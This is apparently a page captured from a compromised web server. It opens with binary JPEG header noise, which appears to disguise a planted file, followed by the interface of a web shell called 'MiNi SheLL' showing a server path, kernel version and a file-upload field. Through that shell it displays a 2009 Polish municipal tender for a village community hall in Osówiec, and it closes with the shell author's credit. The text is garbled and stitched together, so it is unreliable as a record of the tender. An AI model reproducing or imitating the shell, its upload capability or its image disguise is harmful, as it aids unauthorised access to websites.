JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090929/165487-N-2009.html

<p class="kh_header"><b>Sicienko: Budowa świetlicy wiejskiej w Osówcu wraz z zagospodarowaniem terenu</b><br>
<b>Numer ogłoszenia: 165487 - 2009; data zamieszczenia: 29.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sicienko , ul. Mrotecka 9, 86-014 Sicienko, woj. kujawsko-pomorskie, tel. 052 55 41 223, 0-52 58 70 755, faks 052 5870407.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sicienko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa świetlicy wiejskiej w Osówcu wraz z zagospodarowaniem terenu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje w szczególności:
1)	Budowę nowego budynku świetlicy wiejskiej wyposażonego w wewnętrzne instalacje: elektryczną, wod-kan, wentylacji, centralnego ogrzewania  w którym znajdują się:
1.1 Sala świetlicy - 100,0 m2
1.2 Komunikacja - 6,1 m2
1.3 Przedsionek - 4,3 m2
1.4 Zaplecze sali - 7,4 m2
1.5 Kotłownia - 5,3 m2
1.6 Magazyn opału - 7,9 m2
1.7 Przedsionek - 5,9 m2
1.8 WC męskie - 7,0 m2
1.9 WC damskie - 5,5 m2
1.10 Magazyn - 13,6 m2
Budynek wolnostojący, jednokondygnacyjny o rzucie łamanym w kształcie litery L. Obiekt zaprojektowany został w technologii tradycyjnej, murowanej. Ściana zewnętrzna dwuwarstwowa, murowana z bloczków gazobetonowych z rdzeniami żelbetowymi, zaizolowana styropianem grubości 12cm. Konstrukcję dachu zaprojektowano jako drewnianą o kącie nachylenia krokwi 30 stopni. W głównym pomieszczeniu jakim jest sala świetlicy z kominkiem układ konstrukcyjny krokwi, jętek, wieszaków i ściągów będzie widoczny stanowiąc jednocześnie wystrój wnętrza. Nad pozostałymi pomieszczeniami zaprojektowano strop żelbetowy na którym będzie ułożone ocieplenie w postaci wełny mineralnej.	

2)	Ogrodzenie terenu 
Na ogrodzenie składają się następujące elementy:
-słupki stalowe ocynkowane powleczone PCV w kolorze ciemnozielonym. Stalowe rury o średnicy O48,3mm i wysokości 180cm zakończone kapturkiem osłonowym z mrozoodpornego tworzywa sztucznego. Rozstaw osiowy słupków 240cm. Słupki betonowane w fundamencie na głębokości 40cm.
-siatka ogrodzeniowa (kolor ciemnozielony) druciana pleciona, ślimakowa i wykonana z drutu stalowego ocynkowanego powleczonego PCV (wymiar oczka 5x5cm). 
- fundament z betonu B-15. Szerokość fundamentu 20cm. Poziom posadowienia 50cm poniżej poziomu terenu. Cokół fundamentu wynieść na wysokość 15cm powyżej poziomu terenu

3)	Zagospodarowanie terenu 
- Układ komunikacyjny wewnętrzny stanowić będzie wewnętrzna droga dojazdowa z drogi gminnej utwardzonej tłuczniem. Droga ta wykonana będzie z kostki betonowej o gr.8 cm na podsypce cementowo-piaskowej i podbudowie z betonu. Wzdłuż drogi zaprojektowano chodnik o nawierzchni z kostki betonowej o gr.8 cm na podsypce cementowo-piaskowej i podbudowie z piasku. Ponadto planuje się wybudowanie miejsc postojowych dla pojazdów osobowych na 6 stanowisk w tym jedno dla osoby niepełnosprawnej. Parking ten wybudowany będzie z kostki betonowej ażurowej. Dojazd z drogi wewnętrznej na parking wzmocniony będzie kratą trawnikową. Pomiędzy drogą a miejscem parkingowym planowane jest wyodrębnienie  miejsca na śmietnik i skład żużla. Miejsce to należy utwardzić kostką betonową o gr.8 cm na podsypce cementowo-piaskowej i podbudowie z piasku. W części południowej działki zlokalizowano boisko do gry w koszykówkę i siatkówkę o wymiarach 14x28 m. Planuje się wykonanie boiska o nawierzchni z kostki betonowej o gr.8 cm o kształcie prostokątnym i z minimalną fazą. Pomiędzy budynkiem świetlicy a boiskiem wyodrębniono miejsce do grillowania. Miejsce to należy wykonać z kamienia polnego na podsypce cementowo-piaskowej układanego promieniowo. Pomiędzy świetlicą , boiskiem wielofunkcyjnym a miejscem do grillowania planowane są do wybudowania utwardzone ścieżki 
4) Przyłącze wodociągowo-kanalizacyjne.
- przyłącze wodociągowe planuje się wykonać z istniejącego wodociągu O 110 zlokalizowanego na działce. Projektuje się wykonać przyłącze z rur PE szeregu SDR13,6. Włączenie do istniejącego wodociągu poprzez nawiertkę. Ponadto projektuje się zainstalować w studni wodomierzowej 1,2 m żelbetowej wodomierz JS 3,5 dn 25mm.
- przyłącze kanalizacyjne - ścieki sanitarne odprowadzone będą kanałem grawitacyjnym do projektowanej pompowni ścieków z pompą ślimakową, skąd ścieki przetłoczone zostaną do istniejącej sieci kanalizacji tłocznej.  Przyłącze kanalizacji wykonać z rur O 160 x 4,7 PCV, natomiast przewód tłoczny wykonać z rur PE 80 szeregu SDR 13,6 o średnicy 40x3,0 mm.

5) Przyłącze energetyczne
  - należy wykonać przyłącze energetyczne od usytuowanego na granicy działki  nr 51/1 złącza kontrolno-pomiarowego do  rozdzielnicy głównej zaprojektowanej w budynku świetlicy.

6) Zewnętrzne oświetlenie 
- oświetlenie zewnętrzne wokół budynku, boiska wielofunkcyjnego, miejsca na grila planuje się wykonać lampami parkowymi zasilanymi z rozdzielnicy. Lampy mocowane będą na słupach o wysokości 4 m i sterowane wyłącznikiem zmierzchowym i czasowym.

7) instalacja odgromowa 
- projektuje się wykonanie instalacji odgromowej budynku ze zwodem poziomym wykonanym z drutu stalowego ocynkowanego rozmieszczonego na dachu budynku. Dach pokryty będzie dachówka ceramiczną. Przewody odprowadzające prowadzić  po ścianach pionowych budynku pod izolacją termiczną.

8) wyposażenie świetlicy
-  świetlicę należy wyposażyć w określone poniżej jakościowo i ilościowo elementy:
Stół drewniany o wymiarach 90x90 cm w ilości  11 sztuk,Krzesła z drewnianym siedziskiem i metalowym stelażem w ilości 40 sztuk,Szafa aktowa dwudrzwiowa stojąca o wysokości 180 cm i szerokości 90cm w ilości 2 sztuki,Biurko dwuszafkowe o szerokości 90 cm	 w ilości 1 sztuka,Telewizor LCD o przekątnej 32 w ilości 1 sztuka,Odtwarzacz DVD w ilości 1 sztuka,Wieszak ścienny do umocowania telewizora w ilości 1 sztuka, Wieża stereofoniczna HI-FI w ilości 1 sztuka,Kuchenka gazowa czteropalnikowa z piekarnikiem elektrycznym w ilości 1 sztuka,Butla gazowa na propan-butan z oprzyrządowaniem ( m.in..reduktor, wężyki) jeden komplet,Chłodziarka o pojemności 180l w ilości 1 sztuka,Szafka pod zlewozmywak dwukomorowy w ilości 1 sztuka,Szafka wisząca dwudrzwiowa o szerokości 90 cm w ilości 1 sztuka,Wieszaki drewniane wiszące z pięcioma haczykami na odzież każdyw ilości  3 sztuki.

Drewniane elementy należy wykonać w jednym kolorze, aby stanowiły one jedną całość  w obiekcie
 Elementy wyposażenia świetlicy nie są wymienione w załączonym do SIWZ przedmiarze. Oferent winien skalkulować wyposażenie na osobnym dokumencie, który stanowić  będzie załącznik do oferty
Realizację zadania przewidziano na okres od kwietnia 2010 roku do czerwca 2011roku., przy czym bezwarunkowo na koniec października 2010 roku należy osiągnąć stan surowy obiektu tj. wykonać prace ziemne, stan zerowy- fundamenty, wybudować ściany oraz wykonać dach. Obiekt w takim stanie będzie przedmiotem odbioru częściowego. Pozytywny odbiór tych prac umożliwi Wykonawcy wystawienie faktury przejściowej za wykonane prace, która płatna będzie w terminie 30 dni od dnia jej dostarczenia do siedziby zamawiającego.  Odbiór wszystkich pozostałych elementów przedmiotu zamówienia nastąpi w miesiącu lipcu 2011 roku.
Wszystkie prace należy wykonać zgodnie z zatwierdzonym projektem budowlano-wykonawczym, warunkami określonymi w decyzji o pozwoleniu na budowę, polskimi i branżowymi normami. Wszystkie roboty instalacyjne należy wykonać zgodnie z Warunkami technicznymi wykonania i odbioru robót budowlano-montażowych 
 Na wykonawcy spoczywa obowiązek zrealizowania inwestycji  pod klucz , uzyskanie decyzji na użytkowanie obiektu i pełnej obsługi geodezyjnej w zakresie prowadzonych robót. Wykonawca zobowiązany jest także do wykonania instrukcji eksploatacji i konserwacji urządzeń oraz przeszkolenia pracownika eksploatatora kotłowni.
Szczegółowy opis techniczny przedmiotu zamówienia stanowi dokument - dodatek g do SIWZ oraz stanowiąca dodatek i do SIWZ dokumentacja geotechniczna 
Ponadto załącznikiem do SIWZ jest dodatek f - przedmiar robót. Kosztorys ofertowy należy sporządzić ściśle wg załączonego przedmiaru bez wprowadzania w nim jakichkolwiek zmian, zarówno pod względem ilościowym jak również zgodnie z kolejnością pozycji w nim zawartych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.20.00-6, 45.34.20.00-6, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent zapewni, jako część swojej oferty wadium w wysokości 10.000,- zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy spełniają wymogi art.22 ust.1 ustawy-Prawo zamówień publicznych tj. 
a. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
b. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie  innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia
c. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
d. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
Zamawiający dokona oceny spełniania w/w warunków na podstawie kompletności złożonych dokumentów, zgodnie z formułą spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2.	koncesję, zezwolenie lub licencje, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym , zwanym dalej zamówieniem
3.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 do 8 ustawy- Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy- Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5.	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.	oświadczenie o spełnianiu art.22 ust.1 pkt.1-4 ustawy prawo zamówień publicznych (wzór w załączeniu do SIWZ)
7.	oświadczenie  dotyczące art.24 ust.1 pkt.1 i 2 ustawy prawo zamówień publicznych  (wzór w załączeniu do SIWZ)
8.	oświadczenie - wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie -  wzór w załączeniu do SIWZ  . 
9.	oświadczenie - wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje  lub będzie dysponował wykonawca. 
10.	pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeśli w wykazie, o którym mowa w  pkt.9 wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
11.	oświadczenie - informacja na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy- w tym okresie, 
12.	oświadczenie - wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności -  wzór w załączeniu do SIWZ., 
13.	pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia , jeśli w wykazie, o którym mowa w pkt.12 wykonawca wskazał osoby, którymi będzie dysponował
14.	dokumentów stwierdzających, że osoby , które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
15.	polisy, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.sicienko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sicienku ul. Mrotecka 9 ; 86-014 Sicienko.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2009 godzina 09:00, miejsce: Oferty należy składać w Urzędzie Gminy Sicienko ul. Mrotecka 9 pok. 1b.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 03.12.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com